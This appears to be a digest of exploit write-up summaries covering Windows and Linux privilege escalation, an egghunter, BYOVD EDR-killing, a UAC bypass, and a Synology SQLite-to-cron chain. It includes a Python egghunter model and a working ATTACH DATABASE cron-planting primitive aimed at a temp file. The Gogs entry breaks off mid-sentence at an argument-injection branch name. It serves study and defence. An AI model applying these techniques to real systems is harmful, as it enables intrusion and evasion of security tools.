CVE-2018-8611 is a race-condition local privilege escalation (LPE) in the Windows Kernel Transaction Manager (KTM), first caught in the wild by Kaspersky's Automatic Exploit Prevention (AEP) in October 2018 and patched in December 2018. This first instalment lays the KTM foundation that the rest of the series builds on: transaction managers, resource managers, transactions and enlistments.
tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux
cocomelonc's tabby is a tiny teaching framework for writing position-independent Windows x64 shellcode in C, with indirect NT syscalls and no IAT, no CRT and no PE header. The entire toolchain runs on Linux via mingw-w64, nasm, a custom linker script and objcopy; the framework is about 500 lines of C plus about 80 lines of NASM and produces a flat shellcode.bin ready to inject.
Exploiting CVE-2024-1065 via the Page Cache — A Physical-Page UAF in the ARM Mali GPU Driver
CVE-2024-1065 is a physical-page use-after-free in the ARM Mali GPU kernel driver. Because the freed page lands in MIGRATE_MOVABLE, the Dirty Pagetable and Dirty Cred techniques do not apply, so this write-up uses a page-cache spray to swap the freed page into the in-memory copy of /usr/bin/passwd and gets root via execve() without touching disk.
Overcoming Space Restrictions with Egghunters in Windows Exploit Development — Savant Web Server 3.1, Syscall & SEH Egghunters, Heap Staging
When a Windows stack overflow leaves only about 250 bytes of crash-buffer space but a useful Meterpreter payload needs 400 bytes or more, the answer is an egghunter. This walkthrough takes Savant Web Server 3.1 from initial crash to NT-level shell: a partial overwrite to work around a savant.exe module base that contains a null byte, a POP EAX; RET gadget, a 7-byte conditional jump that relies on pre-zeroed memory, two independent buffers (URL path and HTTP body), and then both classic egghunters: the syscall-based one on Windows 10 (with the NEG trick to encode 0x1C8 null-free) and the OS-agnostic SEH-based variant with a custom dispatcher handler.
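Two parts of that entry are easy to model outside a debugger: the NEG trick (store the two's complement of a value whose bytes contain 0x00, then NEG it back in the register) and the hunter loop itself, which probes memory one page at a time and only stops on the tag repeated twice. The following Python is an added example, not code from the Savant walkthrough and not the real ~30-byte x86 hunter; the page-probe syscall is modelled as a set of page indices that would fault, the tag w00t and the image layout are constructed, and 0x1C8 is the value the walkthrough encodes:

```python
import struct
from typing import FrozenSet, Optional, Tuple

# Constructed model of the syscall egghunter's control flow (added example, not the
# write-up's bytes). The real hunter probes each page with a syscall; here the probe
# is modelled by a set of page indices that would return STATUS_ACCESS_VIOLATION.
EGG_TAG = b"w00t"   # 4-byte tag, required twice in a row so the hunter skips its own copy
PAGE = 0x1000       # an unmapped probe advances the scan pointer to the next page


def neg_encode(imm: int) -> Tuple[int, bool]:
    """Two's-complement encoding behind the NEG trick.

    Returns (encoded, null_free): `mov eax, encoded` followed by `neg eax`
    leaves `imm` in EAX, and null_free says whether the 4-byte little-endian
    immediate placed in the instruction stream avoids 0x00 (the raw value
    0x1C8 = c8 01 00 00 does not).
    """
    encoded = (-imm) & 0xFFFFFFFF
    return encoded, b"\x00" not in struct.pack("<I", encoded)


def has_null(imm: int) -> bool:
    """True if the little-endian 32-bit immediate would contain a 0x00 byte."""
    return b"\x00" in struct.pack("<I", imm)


def hunt(memory: bytes, unmapped_pages: FrozenSet[int] = frozenset()) -> Optional[int]:
    """Scan `memory` the way the egghunter loop does.

    On an unmapped page the hunter does the equivalent of `or dx, 0xfff; inc edx`
    and moves to the next page instead of faulting. Returns the offset just past
    the doubled egg (where `jmp edi` lands), or None if no egg is reachable.
    """
    addr = 0
    while addr + 8 <= len(memory):
        if addr // PAGE in unmapped_pages:
            addr = (addr | (PAGE - 1)) + 1
            continue
        if memory[addr:addr + 4] == EGG_TAG and memory[addr + 4:addr + 8] == EGG_TAG:
            return addr + 8
        addr += 1
    return None


def build_image(payload: bytes, egg_offset: int, total_pages: int, decoy_offset: int) -> bytearray:
    """Construct a sample address-space image (constructed data, not a real dump).

    Filler bytes step by 7, so the tag can never appear by accident; a single
    undoubled tag at `decoy_offset` shows why the hunter compares it twice.
    """
    image = bytearray(((i * 7 + 3) & 0xFF) for i in range(total_pages * PAGE))
    image[decoy_offset:decoy_offset + 4] = EGG_TAG
    image[egg_offset:egg_offset + 8] = EGG_TAG * 2
    image[egg_offset + 8:egg_offset + 8 + len(payload)] = payload
    return image


def demo() -> Tuple[int, bool, Optional[int], Optional[int], bytes]:
    payload = b"\x90" * 16 + b"\xcc"          # stand-in for the 400+ byte Meterpreter stage
    egg_offset = 2 * PAGE + 0x100             # egg sits on page 2
    image = build_image(payload, egg_offset, total_pages=4, decoy_offset=0x40)
    encoded, null_free = neg_encode(0x1C8)
    found = hunt(bytes(image), frozenset({1}))    # page 1 is unmapped and gets skipped over
    missed = hunt(bytes(image), frozenset({2}))   # unmapping the egg's own page hides it
    landed = bytes(image[found:found + len(payload)]) if found is not None else b""
    return encoded, null_free, found, missed, landed


if __name__ == "__main__":
    print(demo())
```

The decoy single tag at 0x40 is passed over because only the doubled tag counts; the second `hunt` call shows the failure mode the page-probe exists for: an egg on a page the probe reports as unmapped is never found, which is why the payload must sit in memory that is actually committed, here the second request buffer.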
Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1732): Walkthrough of the ConsoleControl Offset Confusion
CVE-2021-1732 is a Win32k local privilege escalation in win32kfull.sys. By flipping the 0x800 bit on tagWND with NtUserConsoleControl and returning a fake value from a user-mode callback inside xxxClientAllocWindowClassExtraBytes, an attacker turns the cbWndExtra length into a controllable kernel write offset and walks the token to NT AUTHORITY\SYSTEM. End-to-end Metasploit PoC against Windows 10 20H2.
Patching the Windows Kernel via BYOVD: ThrottleStop.sys, MmMapIoSpace and the NtAddAtom Trampoline
zer0matt's Milan0day 2026 talk walks through a clean BYOVD chain: ThrottleStop.sys (CVE-2025-7771) gives arbitrary physical-memory read/write via MmMapIoSpace, which is used to inline-patch NtAddAtom into a temporary trampoline. Phase 1 redirects it to PsLookupProcessByProcessId to obtain the target's EPROCESS pointer; phase 2 redirects it to PsTerminateProcess to kill the AV/EDR process from kernel mode. The original bytes are restored after each call to avoid PatchGuard. PoC: github.com/zer0matt/Milan0day2026
OOBdump: Single-Shot Heap-OOB Exploitation of objdump -g via FR30 Relocations
A missing bounds check in binutils’ FR30 relocation handler lets a single crafted object file turn objdump -g into a one-shot exploit chain — defeating ASLR, PIE and modern heap hardening with no information leak. The Calif team’s writeup walks through wrapping a 64-bit arelent offset, swapping endianness via a 2-byte partial overwrite of an xvec pointer, borrowing i386’s partial_inplace relocation as an OOB increment, and finally pivoting to code execution through a House of Apple 2 FILE-struct hijack.
Eventvwr.exe UAC Bypass via mscfile: Anatomy of a Classic HKCU Registry Hijack
A walkthrough of the well-documented Windows UAC bypass that combines eventvwr.exe's auto-elevate manifest with a writable HKCU registry handler for the mscfile shell verb. Writing a single REG_SZ value under HKCU\Software\Classes\mscfile\shell\open\command and launching eventvwr.exe via ShellExecuteEx with the runas verb causes Windows to spawn the attacker's payload at High integrity with no consent prompt. S12 reproduces the technique in a small C++ tool, demonstrates near-universal AV evasion on Kleenscan, and discusses the detection footprint.
Gogs Authenticated RCE via git rebase --exec Argument Injection (Unpatched)
Rapid7's Jonah Burgess has disclosed a critical (CVSS 9.4) authenticated argument-injection RCE in the self-hosted Gogs Git server. Any authenticated user can create a branch named "--exec=
Writing Sync, Popping Cron: A Novel SQLite-Injection-to-Cron RCE on Synology BeeStation (CVE-2024-50629/50630/50631)
A deep technical write-up of the Synology BeeStation pre-auth RCE chain that DEVCORE disclosed at Pwn2Own Ireland 2024 (CVE-2024-50629, CRLF injection; CVE-2024-50630, auth bypass via the webapi-to-syncd domain-socket trust; CVE-2024-50631, SQL injection in update_settings), plus an N-day variant by Kiddo that swaps DEVCORE's PHP-based RCE for a novel ATTACH DATABASE primitive against /etc/cron.d/pwn.task, exploiting cron's tolerance for unparsable lines to embed a working reverse-shell crontab entry inside an otherwise binary SQLite file.
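The primitive behind Kiddo's variant is worth seeing end to end: ATTACH DATABASE makes SQLite create a brand-new file at an attacker-chosen path, and a row inserted into a table in that file is stored byte-for-byte inside a b-tree page, so a value wrapped in newlines becomes a clean line of text between two lines of binary page data. The Python below is an added example, not DEVCORE's or Kiddo's exploit code and not run against a BeeStation: it writes to a temporary file instead of /etc/cron.d/pwn.task, uses a constructed cron line, and models cron's line-skipping with a small regex-based reader (the actual cron daemon behaviour is what the write-up relies on, not this parser):

```python
import os
import re
import sqlite3
import tempfile
from typing import List, Tuple

# Constructed payload line (hypothetical command); the write-up's real target path was
# /etc/cron.d/pwn.task, this example writes to a temp directory instead.
CRON_LINE = b"* * * * * root /bin/sh -c 'echo pwned > /tmp/pwned'"

# Shape of an /etc/cron.d entry: five schedule fields, a user name, then a command.
# This models a reader that skips anything not matching; it is not cron's own parser.
CRON_RE = re.compile(rb"^(?:\S+\s+){5}[a-z_][a-z0-9_-]*\s+\S.*$")


def plant_cron_line(path: str, line: bytes) -> None:
    """The ATTACH DATABASE primitive.

    SQLite creates `path` as a fresh database; the inserted BLOB lands inside a
    b-tree cell unchanged, so surrounding it with newlines puts the payload on
    a line of its own and pushes the binary page bytes onto the neighbouring lines.
    """
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE ? AS pwn", (path,))
    con.execute("CREATE TABLE pwn.t (x BLOB)")
    con.execute("INSERT INTO pwn.t VALUES (?)", (b"\n" + line + b"\n",))
    con.commit()
    con.close()


def cron_accepted_lines(path: str) -> List[bytes]:
    """Model of a crontab reader that skips lines it cannot parse (the tolerance
    the write-up exploits): return only the lines matching the cron.d entry shape."""
    with open(path, "rb") as f:
        return [ln for ln in f.read().split(b"\n") if CRON_RE.match(ln)]


def demo() -> Tuple[bytes, int, List[bytes]]:
    """Plant the line, then show the file is a valid SQLite database whose only
    parseable crontab line is the payload."""
    path = os.path.join(tempfile.mkdtemp(), "pwn.task")
    plant_cron_line(path, CRON_LINE)
    with open(path, "rb") as f:
        data = f.read()
    return data[:16], len(data.split(b"\n")), cron_accepted_lines(path)


if __name__ == "__main__":
    header, total_lines, accepted = demo()
    print(header, total_lines, accepted)
```

The file still opens as a normal SQLite database (the 16-byte magic header is intact), which is also the detection angle: a file under /etc/cron.d that starts with `SQLite format 3` has no legitimate reason to exist, and the ATTACH statement itself is visible to any query logging on the syncd side.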